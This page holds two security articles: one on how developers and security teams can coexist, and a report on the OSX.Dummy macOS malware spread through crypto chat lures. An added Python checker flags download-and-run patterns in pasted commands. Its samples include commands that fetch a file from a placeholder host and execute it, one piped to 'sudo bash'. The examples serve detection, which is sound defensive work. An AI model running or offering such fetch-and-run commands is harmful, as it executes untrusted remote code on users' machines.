When Developers and Cybersecurity Go To War

Some developers love to write crafty code; others rely on strange code bases or unsanctioned services. All of this creates a running battle with cybersecurity teams trying to protect the business and its users. Here’s how both can coexist in relative peace, with a good balance between features and security.

Regardless of whether developers are building a Windows or Linux application, a mobile app, cloud service, chatbot, Docker utility or progressive web app, great risks are often being taken, sometimes unknowingly.

Cybersecurity teams know it can take just one weakness across the application or any service it touches to make the business or its customers vulnerable to hackers and their army of automated tools.

The risks come into play regardless of the history of the coding team. From rockstar developers to fresh-out-of-college graduates, missing one port reference, ignoring one internal rule or borrowing one dubious codelet that solves a problem can wreak havoc on the business.

Let’s Be Coding Friends

Both sides of the equation are under pressure. Business leaders want their coders to churn out apps and tools to use or sell yesterday. Meanwhile, cybersecurity teams are tasked with being as invisible and frictionless as possible, while protecting everyone from the armies of darkness beyond the firewall.

The key to success is clarity of message and a well-defined plan for each project. Security must be an equal part of the quality checklist that any project goes through. Many code shops are moving to the DevOps model, where modular, goal-based milestones mark the lifecycle of the project.

In tandem with agile development, these milestones help move projects rapidly, but within a structurally defined process for quality, goal-meeting and feature management. Add security to that list and a business can proceed to develop apps that meet all the company’s security requirements, are tested for integrity and meet any industry or governmental standards.

To achieve this, the heads of both the security and development teams need to be on the same page, highlighting the security-as-quality message. By building in security checks and code validation, training all developers in the aspects of vulnerabilities, and holding regular check-ins along the way to completion, a secure outcome for the application is guaranteed.

Every Business Needs a Security Master

An increasingly common role in larger enterprises is a chief digital/information security officer (or similar). In any smaller business, someone suitably qualified needs to take on that role and be responsible for the reporting, cataloguing and management of security solutions, risks and flaws.

That person is an ideal focal point for getting the development teams in line with the security needs of the business. This person can be one of the development team and, with responsibility for any future issues, is more likely to police the team’s efforts. To help build a strong bond between the two, when launching a development project, teams must follow the ground rules set by the security team.

The Rules of the Coding Road

Training lessons or days that cover the need for security, what happens when it is ignored, and the main and minor flaws in coding techniques that lead to hacks will help alert developers to the risks.

Code bounties and rewards can help encourage developers to spot flaws across the project code base, and any business should offer company-wide training in spotting hacks, flaws and other ways that hackers could access native code.

These guidelines, along with strong rules on “borrowed” code, use of outside services and other likely weak points, will see any business develop stronger, more secure applications.

New Threats to MacOS From Malware in Cryptocurrency Chats Could Turn Your Investment Dreams to Dust

The general perception that MacOS is a safe OS is increasingly challenged by waves of threats and a wide range of attack vectors that could impact any operating system. The latest threat sees crypto chats laden with malware to tempt those looking to make an online killing, who could instead end up as another cyber victim.

By Chris Knight

The move to always-online collaboration tools opens up MacOS and all PC users to a new range of threats. Users can be talking online about areas of interest, such as cryptocurrency, a popular topic. All of a sudden, they are invited by an admin to download a command line code snippet as part of an intriguing crypto tool. Within seconds, their Mac can be infected by a nasty malware download that can allow for remote command execution.

Crypto is a hot target for hackers, who try either to gain a user’s account details or to replace the user’s account in mining software with the hackers’ own, earning money for them. A recent McAfee Security Report (PDF) shows that cryptojacking attacks have risen by a hefty 629% in the opening months of 2018.

With thousands of coins seeking attention, looking to replicate the success of Bitcoin, and initial coin offerings (ICOs) competing with each other across a wide range of exchanges, there are millions of users looking to make a quick buck. This booming, free-for-all landscape is ripe for hackers to make a killing of their own.

Welcome OSX.Dummy

The early efforts, as demonstrated by this recent attack, are not particularly sophisticated (hence the Dummy nickname). But with people keen to make a profit on the latest crypto news, their guard may be down. The attack was originally reported by a Dutch security analyst and, as with most threats, more sophisticated versions will be rapidly developed by better crackers to up the ante.

This latest threat is called OSX.Dummy and during the course of online chats, users are asked to download a code snippet, which becomes an unsigned download that can bypass the MacOS Gatekeeper protection tool.

Command line codes are quite common for bitcoin miners and others interested in crypto and alt coin currencies, so this type of discussion is not out of the ordinary. People use generic bitcoin miners to mine different currencies which often require patches, code updates and other tweaks to keep them working, with many open source projects open to malware injection or other risks.
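The lure described above ends with the user pasting a command that fetches a file and runs it. As an added example (not from the original article), this Python check flags that download-and-run shape in a pasted command line before it is executed; the function names, rule labels and sample commands are constructed for illustration.

```python
import os
import shlex

OUTPUT_FLAGS = {"curl": {"-o", "--output"}, "wget": {"-O", "--output-document"}}
SHELLS = {"sh", "bash", "zsh"}

def simple_commands(line):
    """Yield (argv, separator_after) for each simple command in a shell line."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep URLs and modes such as +x as single tokens
    argv = []
    for tok in lex:
        if tok in {"|", "||", "&", "&&", ";"}:
            if argv:
                yield argv, tok
            argv = []
        else:
            argv.append(tok)
    if argv:
        yield argv, ""

def review_paste(line):
    """Return the download-and-run findings for one pasted command line."""
    findings, fetched, piped_fetch = set(), set(), False
    for argv, sep in simple_commands(line):
        argv = argv[1:] if argv[0] == "sudo" and len(argv) > 1 else argv
        prog = os.path.basename(argv[0])
        args = {os.path.normpath(a) for a in argv[1:]}
        if piped_fetch and prog in SHELLS:
            findings.add("fetch-piped-to-shell")
        if prog in OUTPUT_FLAGS:  # curl/wget: remember where the download is saved
            for flag, value in zip(argv, argv[1:]):
                if flag in OUTPUT_FLAGS[prog]:
                    fetched.add(os.path.normpath(value))
        elif prog == "chmod" and args & fetched:
            findings.add("chmod-on-fetched-file")
        elif os.path.normpath(argv[0]) in fetched or (prog in SHELLS and args & fetched):
            findings.add("runs-fetched-file")
        piped_fetch = prog in OUTPUT_FLAGS and sep == "|"
    return findings

# Constructed sample pastes (not taken from the article or any real campaign).
SAMPLES = [
    "curl -s https://files.example.invalid/miner-fix -o /tmp/fix && chmod +x /tmp/fix && /tmp/fix",
    "curl -fsSL https://files.example.invalid/setup.sh | sudo bash",
    "brew install jq && jq --version",
]
if __name__ == "__main__":
    for sample in SAMPLES:
        print(sorted(review_paste(sample)) or "no findings", "<-", sample)
```

A finding means the paste deserves a read of the fetched file first; an empty result is not proof that a command is safe.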

The trouble is, hackers and scammers are not far behind on any legitimate post or forum. Slack, Twitter, GitHub messages and other chats are full of them, luring people in. Many are annoyances or obvious to avoid, but now that hackers have set their sights on this market, the risk will only grow.

Hopefully, users will become more aware of the threats. But with newer coins coming to market and cryptocurrencies gaining wider interest, there will be a constant stream of tempted newcomers who will be at risk.

Non-technical users, or experienced users who think they are safe because they are using a Mac, could get stung while trying their luck at crypto. OSX.Dummy might just be the first effort to take on Mac owners in this battle, but it won’t be the last. Mac owners can’t rely on Gatekeeper to remain safe, so they will need firewall, anti-intrusion and other tools to protect their networks.